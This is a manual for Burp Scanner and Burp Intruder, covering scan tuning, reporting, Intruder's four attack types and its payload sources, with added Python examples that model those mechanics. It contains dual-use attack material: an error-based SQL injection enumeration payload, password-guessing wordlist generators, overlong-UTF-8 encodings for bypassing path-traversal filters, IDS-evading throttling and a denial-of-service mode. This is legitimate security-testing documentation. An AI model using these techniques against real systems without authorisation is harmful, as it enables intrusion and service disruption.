Note that if you delete an issue, and Burp rediscovers the same issue (for example, if you rescan the same request), the issue will be reported again. If instead you mark the issue as a false positive, then this will not happen. Therefore, deletion of issues is best used for cleaning up the Results tree to remove hosts or paths you are not interested in. For unwanted issues within the functionality you are still working on, you should use the false positive flag.

Scan optimisation

Burp Scanner gives you detailed information in real time about all of the actions it is performing. In the scan queue, you can monitor the progress of each individual base request that is being scanned. The table shows you the number of "insertion points" where Burp is placing payloads, and the number of attack requests that have been generated. (The latter is not a linear function of the former - observed application behaviour feeds back into subsequent attack requests, just as it would for a human tester.)

This information lets you quickly see whether any of your scans are progressing too slowly, and understand the reasons why. Given this information, you can then take action to optimise your scans. Within the scan queue, there is a context menu which lets you cancel or re-prioritise individual items. Within the Options tab, you can also optimise the scanner configuration based on what you have learnt about the application, using the options described below.

Attack insertion points

A key factor in the speed and effectiveness of scans is the selection of attack insertion points. Burp gives you fine-grained control over the locations within the base request where attack payloads will be placed, using the following configuration options:

The checkboxes let you define which locations within HTTP requests will have attacks placed into them:

- The values of URL, body and cookie parameters.
- Parameter name - if selected, Burp adds an additional parameter to the request and places attacks into the name of this parameter, often detecting unusual bugs that are missed if only parameter values are tested.
- HTTP headers - if selected, Burp places attacks into the User-Agent and Referer headers, often detecting issues like SQL injection or persistent XSS within logging functionality.
- AMF string parameters - For requests in Action Message Format, Burp places attacks into any string-based data types within the message.
- REST-style URL parameters - if selected, Burp places attacks into each directory or file name within the path portion of the URL.

You can also set a limit on the number of insertion points that Burp will attack within each base request. Occasionally, HTML forms may contain an excessive number of fields (hundreds, or more). If Burp performed a full vulnerability scan of every field, the scan would take an excessive amount of time to complete. Setting a limit on insertion points prevents your scans from becoming stalled if they encounter forms with huge numbers of parameters. When this limit is applied, the item's entry in the scan queue will indicate the number of insertion points that were skipped, enabling you to manually review the base request and decide if it is worth performing a full vulnerability scan of all its possible entry points.

You can tell Burp to use "intelligent attack selection". This option causes Burp to perform or omit each type of server-side check based on the base value of each attack insertion point. For example, if a parameter's value contains characters that don't normally appear in filenames, Burp will skip file path traversal checks for this parameter. Using this option can considerably speed up your scans, with minimal risk of missing actual vulnerabilities that exist.

The insertion point configuration lets you specify request parameters for which Burp should skip server-side injection checks. These checks are relatively time-consuming, because Burp sends multiple requests probing for various blind vulnerabilities on the server. If you believe that certain parameters appearing within requests are not vulnerable (for example, built-in parameters used only by the platform or web server), you can tell Burp not to test these. (Note that client-side checks like cross-site scripting are always performed because testing each request parameter imposes minimal overhead on the duration of the scan if the parameter is non-vulnerable.)

You can identify REST parameters by their position (slash-delimited) within the URL path, as well as by their value. To do this, select "REST parameter" from the parameter drop-down, "name" from the item drop-down, and specify the index number (1-based) of the position within the URL path which you wish to exclude from testing. You can also configure any parameters for which Burp should not perform any checks whatsoever.

It is possible to specify fully customisable attack insertion points for active scanning, so you can specify arbitrary locations within a base request where attack strings should be placed. To use this function, send the relevant base request to Intruder, use the payload positions UI to define the start/end of each insertion point in the usual way, and select the Intruder menu option "actively scan defined insertion points".

Active scanning engine

These options let you fine-tune Burp's scan engine, depending on the performance impact on the application, and on your own processing power and bandwidth. If you find that your scans are running slowly, but the application is performing well and your own CPU utilisation is low, you can increase the number of scan threads to make your scans proceed faster. If you find that connection errors are occurring, that the application is slowing down, or that your own computer is locking up, you should reduce the thread count, and maybe increase the number of retries on network failure and the pause between retries. If the functionality of the application is such that actions performed on one base request interfere with the responses returned from other requests, you should consider reducing the thread count to 1, to ensure that only a single base request is scanned at a time.

If you wish to avoid overloading the application, or to remain stealthy from a network perspective, you can use the throttle settings to add fixed or random intervals between requests.

You can configure whether the scanner should follow redirections where this is necessary to identify certain vulnerabilities (for example echoed input or a database error message which is only displayed when a redirect is followed).

Because some applications issue redirects to third-party URLs which include parameter values that you have submitted, Burp protects you against inadvertently attacking third-party applications, by not following just any redirection which is received. If the request being scanned is within the defined target scope (i.e. you are using target scope to control what gets scanned), then Burp will only follow redirects that are within that scope. If the request being scanned is not in scope (i.e. you have manually initiated a scan of an out-of-scope request), Burp will only follow redirects which (a) are to the same host/port as the request being scanned; and (b) are not explicitly covered by a scope exclusion rule (e.g. "logout.aspx").
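The redirect rule above, as an added example written for this chapter (it is not Burp's own code): a small decision function with a deliberately simple scope model, which is an assumption, a set of allowed (host, port) pairs plus exclusion strings matched against the URL path. Burp's real scope rules are richer, but the decision logic is the one the text describes, and it is what keeps attack strings from being replayed against a third party that the application redirects to.

```python
from urllib.parse import urlsplit

# Added example of the redirect-following rule. The scope model is an
# assumption for illustration: a set of (host, port) pairs plus exclusion
# strings matched against the URL path.


def host_port(url):
    """Return (hostname, port) for a URL, filling in the scheme's default port."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    return u.hostname, port


def is_excluded(url, exclusions):
    """True if an exclusion rule (e.g. "logout.aspx") matches the URL path."""
    path = urlsplit(url).path
    return any(rule in path for rule in exclusions)


def in_scope(url, scope_hosts, exclusions):
    """In scope means: the host:port is listed and no exclusion rule matches."""
    return host_port(url) in scope_hosts and not is_excluded(url, exclusions)


def should_follow_redirect(scanned_url, redirect_url, scope_hosts, exclusions):
    """Decide whether the scanner may follow a redirect received for scanned_url.

    - scanned request in scope: follow only if the target is also in scope, so a
      redirect to a third party carrying our test strings is never followed;
    - scanned request out of scope (a manually started scan): follow only if the
      target is on the same host/port AND is not named by an exclusion rule.
    """
    if in_scope(scanned_url, scope_hosts, exclusions):
        return in_scope(redirect_url, scope_hosts, exclusions)
    return (host_port(redirect_url) == host_port(scanned_url)
            and not is_excluded(redirect_url, exclusions))


# Constructed configuration: one in-scope host and one exclusion rule.
SCOPE = {("app.example", 443)}
EXCLUSIONS = ["logout.aspx"]


if __name__ == "__main__":
    cases = [
        ("https://app.example/search?q=x", "https://app.example/results"),
        ("https://app.example/search?q=x", "https://partner.example/?q=x"),
        ("https://app.example/search?q=x", "https://app.example/logout.aspx"),
        ("http://other.example/a", "http://other.example/b"),
        ("http://other.example/a", "http://other.example:8080/b"),
        ("http://other.example/a", "http://other.example/logout.aspx"),
    ]
    for scanned, target in cases:
        print(scanned, "->", target,
              should_follow_redirect(scanned, target, SCOPE, EXCLUSIONS))
```

The second case is the one the paragraph is about: the scan is in scope, the redirect target is not, so the redirect is dropped even though it carries the submitted parameter value.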

Active scanning areas

These options let you define which checks are performed during active scanning. Each check that is performed increases the number of requests made, and the overall time of each scan. You can turn individual checks on or off, based on your knowledge of an application's technologies, or on how rigorous you require your scans to be. For example, if you know that an application does not use any LDAP, you can turn off LDAP injection tests. Or you can configure Burp to do a quick once-over of an application, checking only for XSS and SQL injection in URL and body parameters, before returning later to carry out more comprehensive testing of every vulnerability type in every insertion point.

Passive scanning areas

Passive scans do not send any requests of their own, and each passive check imposes a negligible processing load on your computer. Nevertheless, you can disable individual areas of checks if you are simply not interested in them and don't want them appearing within scan results.

Reporting

When you have finished testing, you can export a report of all or selected issues in HTML format. To do this, select the desired issues from the aggregated results display (you can multi-select individual hosts, folders, issues, etc.) and select "report issues" from the context menu. The reporting wizard lets you choose various options for your report, including:

 The reporting format (screen- or printer-friendly).
 The level of issue description and remediation to include.
 Whether to show request and response details in full, or as extracts, or not at all.
 The categories of discovered issues to include or exclude.
 Whether to organise issues by type, severity or URL.
 Report title, heading levels, etc.

The report for the cross-site scripting vulnerability shown previously, with all detail turned on, and showing extracts of application responses in printer-friendly format, looks like this:

You can also report issues in XML format, to enable easy integration with other tools. The XML has a flat structure, and contains a list of issues, with meta-information about issue type, URL, etc., reported within each issue element. The (internal) DTD looks like this:


The serialNumber element contains a long integer that is unique to that individual issue. If you export issues several times from the same instance of Burp, you can use the serial number to identify incrementally new issues.

The type element contains an integer which uniquely identifies the type of finding (SQL injection, XSS, etc.). This value is stable across different instances and builds of Burp.

The name element contains the corresponding descriptive name for the issue type.

The path element contains the URL for the issue (excluding query string).

The location element includes both the URL and a description of the entry point for the attack, where relevant (a specific URL parameter, request header, etc.).
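Using the elements described above, an added example (not part of the original text or of Burp) of what the flat XML structure buys you in practice: parsing an export, tallying issues by the stable type id, and diffing two exports from the same instance by serialNumber to find incrementally new issues. The two exports are constructed sample data; the `<issues>`/`<issue>` wrapper element names and the numeric values are assumptions.

```python
import xml.etree.ElementTree as ET

# Two constructed sample exports from the same instance (not real reports).
# Element names follow the description in the text; the <issues>/<issue>
# wrapper names and all numeric values are assumptions.
EXPORT_FIRST = """<?xml version="1.0"?>
<issues>
  <issue>
    <serialNumber>1001</serialNumber>
    <type>100</type>
    <name>Cross-site scripting (reflected)</name>
    <path>/search.aspx</path>
    <location>/search.aspx [q parameter]</location>
  </issue>
  <issue>
    <serialNumber>1002</serialNumber>
    <type>200</type>
    <name>SQL injection</name>
    <path>/products.aspx</path>
    <location>/products.aspx [id parameter]</location>
  </issue>
</issues>
"""

EXPORT_SECOND = """<?xml version="1.0"?>
<issues>
  <issue>
    <serialNumber>1001</serialNumber>
    <type>100</type>
    <name>Cross-site scripting (reflected)</name>
    <path>/search.aspx</path>
    <location>/search.aspx [q parameter]</location>
  </issue>
  <issue>
    <serialNumber>1002</serialNumber>
    <type>200</type>
    <name>SQL injection</name>
    <path>/products.aspx</path>
    <location>/products.aspx [id parameter]</location>
  </issue>
  <issue>
    <serialNumber>1003</serialNumber>
    <type>100</type>
    <name>Cross-site scripting (reflected)</name>
    <path>/feedback.aspx</path>
    <location>/feedback.aspx [comment parameter]</location>
  </issue>
</issues>
"""


def parse_issues(xml_text):
    """Return one dict per <issue>, using the element names described above."""
    root = ET.fromstring(xml_text)
    issues = []
    for node in root.findall("issue"):
        issues.append({
            "serialNumber": int(node.findtext("serialNumber")),
            "type": int(node.findtext("type")),
            "name": node.findtext("name"),
            "path": node.findtext("path"),
            "location": node.findtext("location"),
        })
    return issues


def new_issues(previous_xml, current_xml):
    """Issues in the current export whose serialNumber is absent from the previous one."""
    seen = {issue["serialNumber"] for issue in parse_issues(previous_xml)}
    return [issue for issue in parse_issues(current_xml)
            if issue["serialNumber"] not in seen]


def count_by_type(xml_text):
    """Tally issues by the numeric type id, which is stable across Burp builds."""
    counts = {}
    for issue in parse_issues(xml_text):
        counts[issue["type"]] = counts.get(issue["type"], 0) + 1
    return counts


if __name__ == "__main__":
    for issue in new_issues(EXPORT_FIRST, EXPORT_SECOND):
        print("new:", issue["serialNumber"], issue["name"], issue["location"])
    print(count_by_type(EXPORT_SECOND))
```

Keying on `type` rather than `name` is what makes the tally survive a Burp upgrade, since the text says the integer is stable and the descriptive name is not guaranteed to be. A report embeds server response data, so when the XML comes from a source you do not control, parse it with a hardened parser such as `defusedxml` rather than the standard library one.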

The other elements, some of which are optional and can be selected by the user within the reporting wizard, are hopefully self-explanatory.

What is Burp Intruder?

Burp Intruder is a tool for automating customised attacks against web applications.

Burp Intruder is not a point-and-click tool. To use it effectively you need to understand how the target application functions, and have some knowledge of the HTTP protocol. Before launching any attacks using Burp Intruder, you need to investigate the functionality and structure of the target application, and in particular the various HTTP messages that pass between the browser and server. You can perform this investigation using a standard browser and Burp Proxy to intercept and view all of the requests and responses generated by the application. When you have identified some interesting HTTP requests that bear closer examination, you are ready to use Burp Intruder.

Burp Intruder is highly configurable and can be used to automate a wide range of attacks. You can use Burp Intruder to facilitate very many kinds of tasks, including enumerating identifiers, harvesting useful data, and fuzzing for vulnerabilities. The types of attacks that are appropriate will depend on the application in question, and may include: testing for flaws such as SQL injection, cross-site scripting, buffer overflows and path traversal; brute force attacks against authentication schemes; enumeration; parameter manipulation; trawling for hidden content and functionality; session token sequencing and session hijacking; data mining; concurrency attacks; and application-layer denial-of-service attacks. For a detailed discussion of the kinds of attack that can be performed using Burp Intruder, see Chapter 13 of The Web Application Hacker's Handbook. Burp Intruder includes many preset lists of attack "payloads" (strings that are useful in detecting and exploiting common vulnerabilities). It also contains a large number of tools for dynamically generating attack vectors that are appropriate to specific mechanisms often found within web applications. External files can also be loaded and incorporated into Burp Intruder (e.g. lists of enumerated usernames, or fuzz strings for newly-identified vulnerabilities).

The core activity of each attack is to iterate through a number of HTTP requests. These are derived from the basic request identified at the investigation stage. Burp Intruder manipulates this basic request in particular ways designed to identify or exploit application vulnerabilities. It does this by replacing portions of the basic request with one or more payloads. The timing and execution of each attack can also be configured. Multiple threads can be used to generate requests concurrently. Requests can be throttled to prevent IDS detection. A denial-of-service mode can be used to bombard the server with requests while ignoring any responses received.

When an attack executes, a detailed table of results is produced, showing the response received from the server to each request. The results contain all relevant information that can be used to pinpoint responses that are interesting or successful. In addition to the standard results common to every attack, many customisable tests can be performed on the results at runtime, and the results of these are also recorded. For example, Burp Intruder can be configured to extract specific information from HTML pages (e.g. the personal details fields on a user information page), and record this information with each result. All results output can be exported for further manipulation, or to use as an input file for further attacks or other tools.

Burp Intruder is a Java application, and runs on any platform for which a Java Runtime Environment is available. It requires version 1.5 or later. The JRE can be obtained for free from java.sun.com.

Configuring Burp Intruder

The Burp Intruder control panel lets you configure one or more attacks simultaneously, in their own numbered tabs. You can create a new tab, or rename existing tabs, using the Intruder menu.

The configuration of each individual attack is carried out in a number of sub-tabs (target, positions, payloads, options). The easiest way to create a new attack is to locate the relevant base request within another Burp tool (such as the proxy history or site map), and choose "send to intruder" from the context menu. This will populate the target and positions tabs with the relevant details. You can use the Intruder menu to control how the payloads and options tabs are set up when you create a new attack tab. You can choose to use the default attack configuration, copy the configuration from the first attack tab, or copy from the last attack tab. In this way, you can set up a standard attack configuration in your first attack tab (e.g. for fuzzing all parameters and grepping for error messages) and have this configuration copied into each new attack which you send to intruder. You can also copy attack configurations between arbitrary tabs, or save and load attack configurations, using the Intruder menu.

To start an attack, set up the required configuration and then select "start attack" from the Intruder menu. The configuration options are described in detail in the sections below.

To load a saved attack, select "open saved attack" from the Intruder menu, and choose the required file [Pro version].

Target tab

This tab is used to configure the details of the target server: The "host" field is used to specify the IP address or hostname of the target server. The "port" field is used to specify the port number of the HTTP/S service. The "use SSL" box is used to specify whether Secure Sockets Layer connections should be used.

Positions tab

This tab is used to configure the template for all the HTTP requests generated in the attack:

The main text editor is used to set the contents of the base request, and also to mark the locations where payloads will be inserted into individual HTTP requests during the attack. There is a context menu providing access to various functions. The easiest way to set up the attack template is to locate the relevant request within one of the other Burp tools, and select the "send to intruder" option. You can send requests from any place within Burp Suite where an HTTP request or response is displayed, and also from the Burp Proxy history, site map tree or table, and from within an already executing Burp Intruder attack:

The positions of payloads are marked using pairs of § characters, which may enclose portions of the template text between them. When a payload is placed into a particular position for a given request, the § characters for that position, and any text which appears between them, are replaced with the payload. When a particular position is not assigned a payload for a given request (this applies only to the "sniper" attack type - see below), the § characters for that position are simply removed, and any text which appears between them remains unchanged.

When you send a request from elsewhere within Burp Suite, Burp Intruder makes a best guess at where you are likely to want to place payloads, and it positions these at the value of each URL and body parameter, and each cookie. The markers and enclosed text for each position are automatically highlighted for clarity. You can use the option on the Intruder menu to control whether payload markers are positioned so as to replace or append the existing parameter values. Above the request editor, the number of defined positions and the size of the template text are indicated.

You can also use the buttons on this tab to control the positioning of payload markers:

 add § - This inserts a single position marker at the cursor position.
 clear § - This removes all position markers, either from the entire template or from a selected portion of the template.
 auto § - This makes a guess as to where it might be useful to position payloads and inserts position markers accordingly, either for the entire template or for a selected portion of the template. Any existing markers are removed. This is a useful function to quickly mark positions suitable for attacking certain common vulnerabilities (such as SQL injection), but manual positioning is required for more customised attacks.
 refresh - This refreshes the colour-coding of the editor, if necessary.
 clear - This deletes the entire contents of the editor.

Note that automatic placement of payload positions recognises XML-formatted data within the currently-selected range of the request template. Some applications send XML-encapsulated data within a multipart request body, for example:

POST /function HTTP/1.0
Content-Type: multipart/form-data; boundary=weidhwiderfhwiuehwiuehfwerrf
Content-Length: 202

--weidhwiderfhwiuehwiuehfwerrf
Content-Disposition: form-data; name="data"

foo bar
123
--weidhwiderfhwiuehwiuehfwerrf--

If you perform auto-placement of payload positions on the entire message, then Intruder will mark the whole of the XML block as a single insertion point, which is probably not what you want. Instead, if you manually select the exact XML block, then the auto-placement function will recognise that the selection contains XML, and will mark the individual XML parameter values as insertion points.

The "attack type" drop-down menu is used to define a key aspect of the behaviour of Burp Intruder - the way in which payloads are placed into the specified positions to form individual requests. The four possible attack types are described below:

 sniper - This uses a single set of payloads. It targets each position in turn, and inserts each payload into that position in turn. Positions which are not targeted during a given request are not affected - the position markers are removed and any text which appears between them in the template remains unchanged. This attack type is useful for testing a number of data fields individually for a common vulnerability (e.g. cross-site scripting). The total number of requests generated in the attack is the product of the number of positions and the number of payloads in the payload set.
 battering ram - This uses a single set of payloads. It iterates through the payloads, and inserts the same payload into all of the defined positions at once. This attack type is useful where an attack requires the same input to be inserted in multiple places within the HTTP request (e.g. a username within the Cookie header and within the message body). The total number of requests generated in the attack is the number of payloads in the payload set.
 pitchfork - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through all payload sets simultaneously, and inserts one payload into each defined position. I.e., the first request will insert the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2; the second request will insert the second payload from payload set 1 into position 1 and the second payload from payload set 2 into position 2, etc. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the HTTP request (e.g. a username in one data field, and a known ID number corresponding to that username in another data field). The total number of requests generated by the attack is the number of payloads in the smallest payload set.
 cluster bomb - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. I.e., if there are two payload positions, the attack will place the first payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it will then place the second payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2. This attack type is useful where an attack requires different and unrelated input to be inserted in multiple places within the HTTP request (e.g. a username in one parameter, and an unknown password in another parameter). The total number of requests generated by the attack is the product of the number of payloads in all defined payload sets - this may be extremely large.
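The four attack types, as an added example written for this chapter rather than Burp's own implementation: a template with § markers is split into literal and marked pieces, and each attack type is a generator that decides which payload goes into which position. The template and payload values are constructed, and the request totals match the four rules stated above, which is the quickest way to size an attack before running it (and, on the defending side, to estimate the request volume a scan of this shape produces against your logs).

```python
import itertools

# Added example of Intruder's four attack types; not Burp's code.
MARKER = "\u00a7"   # the § character used to mark payload positions


def split_template(template):
    """Split a request template at § markers.

    Returns (parts, positions): parts is the template cut into literal and
    marked pieces; positions lists the indices into parts that are payload
    positions, whose text is the base value enclosed by the markers.
    """
    pieces = template.split(MARKER)
    if len(pieces) % 2 == 0:
        raise ValueError("unbalanced payload markers")
    positions = [i for i in range(len(pieces)) if i % 2 == 1]
    return pieces, positions


def render(parts, positions, values):
    """Build one request. values[i] is the payload for position i, or None to
    leave the base value in place (markers removed, enclosed text unchanged)."""
    out = list(parts)
    for idx, value in zip(positions, values):
        if value is not None:
            out[idx] = value
    return "".join(out)


def sniper(template, payloads):
    """One payload set; each position targeted in turn. Requests = positions * payloads."""
    parts, positions = split_template(template)
    for target in range(len(positions)):
        for payload in payloads:
            values = [None] * len(positions)
            values[target] = payload
            yield render(parts, positions, values)


def battering_ram(template, payloads):
    """One payload set; the same payload in every position. Requests = payloads."""
    parts, positions = split_template(template)
    for payload in payloads:
        yield render(parts, positions, [payload] * len(positions))


def _check_sets(positions, payload_sets):
    if len(payload_sets) != len(positions) or len(positions) > 8:
        raise ValueError("one payload set per position, at most 8 positions")


def pitchfork(template, payload_sets):
    """One set per position, stepped in parallel. Requests = size of the smallest set."""
    parts, positions = split_template(template)
    _check_sets(positions, payload_sets)
    for combo in zip(*payload_sets):           # zip stops at the shortest set
        yield render(parts, positions, list(combo))


def cluster_bomb(template, payload_sets):
    """One set per position, every combination. Requests = product of the set sizes."""
    parts, positions = split_template(template)
    _check_sets(positions, payload_sets)
    for combo in itertools.product(*payload_sets):   # last position varies fastest
        yield render(parts, positions, list(combo))


if __name__ == "__main__":
    # Constructed template: two positions, base values "term" and "1".
    template = "GET /search?q=§term§&page=§1§ HTTP/1.1"
    for name, gen in [("sniper", sniper(template, ["A", "B"])),
                      ("battering ram", battering_ram(template, ["A", "B"])),
                      ("pitchfork", pitchfork(template, [["a", "b", "c"], ["1", "2"]])),
                      ("cluster bomb", cluster_bomb(template, [["a", "b"], ["1", "2", "3"]]))]:
        requests = list(gen)
        print(name, len(requests), requests)
```

Note how sniper leaves the untargeted position's base value in place, which is exactly the behaviour described for unassigned positions, and how cluster bomb's total (2 × 3 here) grows multiplicatively with every extra position.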

Payloads tab

This tab is used to configure one or more sets of payloads. If the "pitchfork" or "cluster bomb" attack types are defined (see Positions tab) then a separate payload set must be configured for each defined payload position (up to a maximum of 8). Use the "payload set" drop-down menu to select which payload set to configure.

For each payload set, it is possible to define the "source" of payloads to use (e.g. preset list, character blocks, brute forcer, etc.), and also various additional processing to be performed on each payload. A large number of payload sources are available within Burp Intruder. Some of these are highly configurable and provide for a huge variety of customised attacks. The source for the current payload set is selected using the drop-down menu. Each payload source is explained separately below.

Payload Sources

Preset list

This is the simplest payload source, and configures a preset list of payload items: The main controls for configuring the list are at the bottom right of the panel. Items can be added manually using the text box and the "add" button. The "add from list" pull-down menu can be used to add predefined lists of useful payloads, including common usernames and passwords, strings designed to detect common vulnerabilities such as SQL injection, etc. The "load ..." button is used to import items from a text file. The "paste" button adds a list of items from the clipboard. The "delete" button removes the selected item, and the "clear" button removes all items from the list.

You can customise the predefined lists of payloads that are accessible on the "add from list" menu. To do this, select "configure preset payload lists" from the Intruder menu, and choose your own directory containing payload files. You can use the "copy" button to copy all of Burp's built-in payload lists into your custom directory, to use alongside your own payload lists:

Runtime file

This payload source configures an external text file from which payloads will be read at runtime. This is useful when a very large list of predefined payloads is needed, to avoid holding the entire list in memory. One payload is read from each line of the file, hence payloads may not contain newline characters.

Custom iterator

This payload source provides a powerful way to generate custom permutations of characters or other items according to a given template. For example, a payroll application may identify individuals using a personnel number of the form AB/12; you may need to iterate through all possible personnel numbers to obtain the details of all individuals. The custom iterator defines up to 8 different "positions" which are used to generate permutations. Each position is configured with a list of items, and an optional "separator" string, which is inserted between that position and the next. In the example described above, positions 1 and 2 would be configured with the items A - Z, positions 3 and 4 with the items 0 - 9, and position 2 would be set with the separator character /. When the attack is executed, the custom iterator iterates through each item in each position, to cover all possible permutations. Hence, in this example, the total number of payloads is equal to 26 * 26 * 10 * 10.

The "scheme" drop-down menu can be used to select a preconfigured setup for the custom iterator. These can be used for various standard attacks or modified for customised attacks. Available schemes include "directory / file . extension", which can be used to enumerate web content, and "password + digit" which can be used to generate an extended wordlist for password guessing attacks.

The controls at the bottom right are used to configure the items at each position. They function in the same way as the controls in the preset list source. The "clear all" button removes all configuration from all positions of the custom iterator.

Character substitution

This payload source takes a preset list of payload items, and produces several payloads from each item by replacing individual characters in the item with different characters, according to customisable rules. This payload source is useful in password guessing attacks, e.g. for producing common variations on dictionary words:

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source.

The list of checkboxes on the right is used to configure the substitution rules. When the attack is executed, the character substitution source works through each of the preset items in turn. For each item, it generates a number of payloads, to include all permutations of substituted characters according to the defined rules. For example, for the first item in the above screenshot, the following payloads will be generated:

aahed
4ahed
a4hed
44hed
aah3d
4ah3d
a4h3d
44h3d

Case substitution

This payload source takes a preset list of payload items, and produces one or more payloads from each item by adjusting the case of characters within each item. This payload source may be useful in password guessing attacks, e.g. for producing case variations on dictionary words.

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source.

The checkboxes on the right are used to configure the case substitution rules. The available rules perform the following functions:

 no change - the item is added to the payload set without being modified
 to lower case - all letters in the item are converted to lower case, and the result is added to the payload set
 to upper case - all letters in the item are converted to upper case, and the result is added to the payload set
 to Propername - the first letter in the item is converted to upper case, the subsequent letters are converted to lower case, and the result is added to the payload set
 to ProperName - the first letter in the item is converted to upper case, the subsequent letters are not changed, and the result is added to the payload set

When the attack is executed, the case substitution source works through each of the preset items in turn. For each item, it generates a payload for each of the selected case substitution rules. If the rule results in a new unique payload, it is added to the payload set (i.e. duplicate payloads are discarded). For example, for the first item in the above screenshot, the following payloads will be generated:

aahed

AAHED

Aahed
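The custom iterator, character substitution and case substitution sources described above, as one added example written for this chapter (not Burp's code). It reproduces the page's own worked cases: the AB/12 personnel-number scheme with its 26 * 26 * 10 * 10 payloads, the eight substitutions of "aahed" with a→4 and e→3, and the three unique case variants of "aahed". The payload orderings are assumptions chosen to match the lists in the text.

```python
import itertools
import string

# Added examples of three Intruder payload sources (custom iterator,
# character substitution, case substitution); not Burp's code.


def custom_iterator(positions, separators=None):
    """Yield every combination of items across up to 8 positions.

    positions:  list of item lists, one per position
    separators: optional list of strings; separators[i] follows position i
    """
    if len(positions) > 8:
        raise ValueError("the custom iterator supports at most 8 positions")
    separators = separators or [""] * len(positions)
    for combo in itertools.product(*positions):   # rightmost position varies fastest
        yield "".join(item + sep for item, sep in zip(combo, separators))


def personnel_numbers():
    """The AB/12 scheme from the text: letters in positions 1-2, digits in 3-4,
    with "/" as the separator after position 2 (26 * 26 * 10 * 10 payloads)."""
    letters = list(string.ascii_uppercase)
    digits = list(string.digits)
    return custom_iterator([letters, letters, digits, digits], ["", "/", "", ""])


def character_substitution(items, rules):
    """For each item, yield every combination of applying the substitution rules
    (a dict such as {"a": "4", "e": "3"}) to the characters they match.

    The earliest substitutable character toggles fastest, which reproduces the
    ordering of the "aahed" list in the text.
    """
    for item in items:
        slots = [i for i, ch in enumerate(item) if ch in rules]
        for mask in itertools.product((False, True), repeat=len(slots)):
            chars = list(item)
            for i, apply in zip(slots, mask[::-1]):
                if apply:
                    chars[i] = rules[item[i]]
            yield "".join(chars)


CASE_RULES = {
    "no change": lambda s: s,
    "to lower case": str.lower,
    "to upper case": str.upper,
    "to Propername": lambda s: s[:1].upper() + s[1:].lower(),
    "to ProperName": lambda s: s[:1].upper() + s[1:],
}


def case_substitution(items, rules=tuple(CASE_RULES)):
    """Apply each selected case rule to each item; duplicates are discarded, so
    the payload set only grows by values it has not seen before."""
    seen = set()
    for item in items:
        for rule in rules:
            candidate = CASE_RULES[rule](item)
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


if __name__ == "__main__":
    print(list(character_substitution(["aahed"], {"a": "4", "e": "3"})))
    print(list(case_substitution(["aahed"])))
    numbers = list(personnel_numbers())
    print(len(numbers), numbers[0], numbers[-1])
```

For "aahed" the lower-case rule and the ProperName rule both produce values already in the set, which is why only three payloads survive; the generator is where that count comes from, and it is also the cheapest way to see how fast a set grows when several rules or substitutions are enabled at once.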

Recursive grep

This payload set works together with the "extract grep" function (which is explained below). It allows payloads to be generated recursively on the basis of responses to earlier requests. The "extract grep" function captures a portion of a server response following a matched regular expression. With "recursive grep" payloads, the captured text from the previous server response is used as the payload for the subsequent request.

This can be used for various enumeration tasks. For example, it may be possible to enumerate the contents of a database via SQL injection by recursively submitting queries of the form:

union select name from sysobjects where name>'a'

The server's error message discloses the name of the first database object:

Syntax error converting the varchar value 'accounts' to a column of data type int.

The query is then repeated using 'accounts' to identify the next object. This task can be easily automated using recursive grep payloads to quickly enumerate all of the objects within the database.

The payload to use in the first request must be manually specified. The payload source can be configured to stop when duplicate successive recursive grep items are found, as this usually indicates that the enumeration is complete. Note that because of the nature of this payload source, attacks which use it cannot use multiple request threads.

Illegal Unicode

This payload source takes a preset list of payload items, and produces a number of payloads from each item by replacing a specified character within each item with illegal Unicode-encodings of a specified character. This payload source may be useful in attempting to circumvent input validation based on pattern-matching, for example defences against path traversal attacks which match on expected encodings of the ../ and ..\ sequences.

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source. The two text boxes at the top configure the character to be substituted within each preset item (here *), and the character to be used as the basis for the illegal encodings (here /). The latter can be specified using the ASCII character itself, or the two-digit hex code for the character (e.g. 00) - this is useful for specifying non-printable ASCII characters, such as null.

The controls in the middle configure the types of illegal encodings which will be generated. These are explained below:

 maximum overlong UTF-8 length - The Unicode encoding scheme allows up to 6 bytes to be used to represent a single character. Basic ASCII characters (0x00 - 0x7F) are correctly represented using a single byte. However, it is possible to represent these in the Unicode scheme using more than one byte (i.e. "overlong" encoding). This drop-down menu is used to specify whether overlong encoding should be used, and if so to set the maximum size that should be used.
 illegal UTF-8 variants - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected. When a character is encoded with more than one byte, the bytes following the first should take the binary form 10xxxxxx, to designate that they are continuation bytes. However, the most significant bits of the first byte also identify how many continuation bytes will follow, so Unicode decoding routines may safely ignore the first 2 bits of continuation bytes. This means that three illegal variants of each continuation byte are possible, with the binary forms 00xxxxxx, 01xxxxxx and 11xxxxxx. If this option is selected, then the illegal Unicode payload source will generate 3 additional encodings for each continuation byte.
 max permutations - This option is available if a maximum overlong UTF-8 length of 3 bytes or more is selected, and "illegal UTF-8 variants" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each continuation byte in turn when generating illegal variants; for each continuation byte, three illegal variants will be generated and the other continuation bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal variants for continuation bytes - i.e. more than one continuation byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.
